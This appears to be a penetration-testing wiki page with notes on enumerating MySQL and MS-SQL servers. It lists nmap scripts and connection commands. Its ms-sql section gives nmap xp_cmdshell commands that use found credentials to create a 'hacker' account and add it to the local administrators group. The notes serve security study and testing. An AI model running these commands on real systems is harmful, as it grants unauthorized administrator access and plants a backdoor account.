Skip to content

MS SQL and MySQL Enumeration Tools

Jump to bottom
TheGetch edited this page May 14, 2021 · 2 revisions

MS-SQL and MySQL Enumeration Tools

MS-SQL and MySQL Enumeration Tools

mysql

$ ls -lh /usr/share/nmap/scripts/ | grep mysql
-rw-r--r-- 1 root root 6.5K Oct 12 09:29 mysql-audit.nse
-rw-r--r-- 1 root root 3.0K Oct 12 09:29 mysql-brute.nse
-rw-r--r-- 1 root root 2.9K Oct 12 09:29 mysql-databases.nse
-rw-r--r-- 1 root root 3.2K Oct 12 09:29 mysql-dump-hashes.nse
-rw-r--r-- 1 root root 2.0K Oct 12 09:29 mysql-empty-password.nse
-rw-r--r-- 1 root root 3.4K Oct 12 09:29 mysql-enum.nse
-rw-r--r-- 1 root root 3.4K Oct 12 09:29 mysql-info.nse
-rw-r--r-- 1 root root 3.7K Oct 12 09:29 mysql-query.nse
-rw-r--r-- 1 root root 2.8K Oct 12 09:29 mysql-users.nse
-rw-r--r-- 1 root root 3.2K Oct 12 09:29 mysql-variables.nse
-rw-r--r-- 1 root root 6.9K Oct 12 09:29 mysql-vuln-cve2012-2122.nse

$ nmap x.x.x.x -p 3306 -sV --script=

Connect manually:

mysql -u {username} -p'{password}' \
    -h {remote server ip or name} -P {port} \
    -D {DB name}

For example

mysql -u root -p'root' \
        -h 127.0.0.1 -P 3306 \
        -D local

Basic enumeration:

  • show databases;
  • list databases;
  • use <database>;
  • list tables;
  • show tables;
  • SELECT * FROM <table>;*

ms-sql

$ ls -lh /usr/share/nmap/scripts/ | grep ms-sql
-rw-r--r-- 1 root root 3.8K Oct 12 09:29 broadcast-ms-sql-discover.nse
-rw-r--r-- 1 root root  12K Oct 12 09:29 ms-sql-brute.nse
-rw-r--r-- 1 root root 6.0K Oct 12 09:29 ms-sql-config.nse
-rw-r--r-- 1 root root 3.4K Oct 12 09:29 ms-sql-dac.nse
-rw-r--r-- 1 root root 4.3K Oct 12 09:29 ms-sql-dump-hashes.nse
-rw-r--r-- 1 root root 7.0K Oct 12 09:29 ms-sql-empty-password.nse
-rw-r--r-- 1 root root 5.9K Oct 12 09:29 ms-sql-hasdbaccess.nse
-rw-r--r-- 1 root root  12K Oct 12 09:29 ms-sql-info.nse
-rw-r--r-- 1 root root 3.9K Oct 12 09:29 ms-sql-ntlm-info.nse
-rw-r--r-- 1 root root 4.7K Oct 12 09:29 ms-sql-query.nse
-rw-r--r-- 1 root root 9.2K Oct 12 09:29 ms-sql-tables.nse
-rw-r--r-- 1 root root 6.2K Oct 12 09:29 ms-sql-xp-cmdshell.nse

$ nmap x.x.x.x -p 1433 -sV --script=exampleScript1.nse,exampleScript2.nse

If mssql credentials are found, can use the following nmap script to add a user:

  1. Use nmap mssql script with newly found creds and added a user:
$ nmap x.x.x.x -p 1433 -sV --script=ms-sql-xp-cmdshell.nse --script-args mssql.username=sa,mssql.password=poiuytrewq,ms-sql-xp-cmdshell.cmd='net user hacker hacker93 /add'
  1. Then added user to admin group with same script:
$ nmap x.x.x.x -p 1433 -sV --script=ms-sql-xp-cmdshell.nse --script-args mssql.username=sa,mssql.password=poiuytrewq,ms-sql-xp-cmdshell.cmd='net localgroup administrators hacker /add'

Connect manually:

$ sqsh -S x.x.x.x -U sa -P password
1> xp_cmdshell 'whoami'

or with Impacket:

$ /opt/impacket-0.9.21/examples > mssqlclient.py username@x.x.x.x

Reference: https://rioasmara.com/2020/05/30/impacket-mssqlclient-reverse-shell/

_Sidebar

Home

1. Recon

Ping Sweep

CIDR to IP

2. Enumeration

Enumeration General Notes

Host/Port Scanning

Services

01. FTP (21)

02. SSH (22)

03. SMTP (25)

04. DNS (53)

05. HTTP (80,443,8080,8443,etc.)

06. POP3 (110)

07. SMB (139,445)

08. SNMP (161,162)

09. LDAP (389)

10. MS-SQL or MySQL (1433,3306)

11. RDP (3389)

12. Winrm (5985)

13. Memcache (11221)

3. Exploitation

Exploitation General Notes

4. Post Exploiation

Post Exploitation General Notes

Editable Service

Privilege Escalation

Scheduled Jobs/Tasks

5. High Value Information

Hashes

6. Reporting

7. Random Notes/Useful Tidbits

Clone this wiki locally